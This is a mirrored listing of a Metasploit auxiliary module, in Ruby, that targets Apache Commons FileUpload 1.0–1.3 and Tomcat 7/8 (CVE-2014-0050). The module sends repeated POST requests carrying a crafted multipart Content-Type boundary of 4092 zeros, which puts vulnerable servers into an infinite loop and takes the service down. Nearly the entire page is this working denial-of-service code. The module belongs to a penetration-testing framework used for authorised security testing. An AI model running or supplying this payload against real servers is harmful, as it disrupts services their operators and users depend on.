Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb
19664 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::HttpClient
8
include Msf::Auxiliary::Dos
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',
15
'Description' => %q{
16
This module triggers an infinite loop in Apache Commons FileUpload 1.0
17
through 1.3 via a specially crafted Content-Type header.
18
Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle
19
mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50
20
and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also
21
uses Commons FileUpload as part of the Manager application.
22
},
23
'Author' => [
24
'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.
25
'ribeirux' # metasploit module
26
],
27
'License' => MSF_LICENSE,
28
'References' => [
29
['CVE', '2014-0050'],
30
['URL', 'https://tomcat.apache.org/security-8.html'],
31
['URL', 'https://tomcat.apache.org/security-7.html']
32
],
33
'DisclosureDate' => '2014-02-06',
34
'Notes' => {
35
'Stability' => [CRASH_SERVICE_DOWN],
36
'SideEffects' => [],
37
'Reliability' => []
38
}
39
)
40
)
41
42
register_options(
43
[
44
Opt::RPORT(8080),
45
OptString.new('TARGETURI', [ true, 'The request URI', '/']),
46
OptInt.new('RLIMIT', [ true, 'Number of requests to send', 50])
47
]
48
)
49
end
50
51
def run
52
boundary = '0' * 4092
53
opts = {
54
'method' => 'POST',
55
'uri' => normalize_uri(target_uri.to_s),
56
'ctype' => "multipart/form-data; boundary=#{boundary}",
57
'data' => "#{boundary}00000",
58
'headers' => {
59
'Accept' => '*/*'
60
}
61
}
62
63
# XXX: There is rarely, if ever, a need for a 'for' loop in Ruby
64
# This should be rewritten with 1.upto() or Enumerable#each or
65
# something
66
for x in 1..datastore['RLIMIT']
67
print_status("Sending request #{x} to #{peer}")
68
begin
69
c = connect
70
r = c.request_cgi(opts)
71
c.send_request(r)
72
# Don't wait for a response
73
rescue ::Rex::ConnectionError => e
74
print_error("Unable to connect: '#{e.message}'")
75
return
76
ensure
77
disconnect(c) if c
78
end
79
end
80
end
81
end
82
83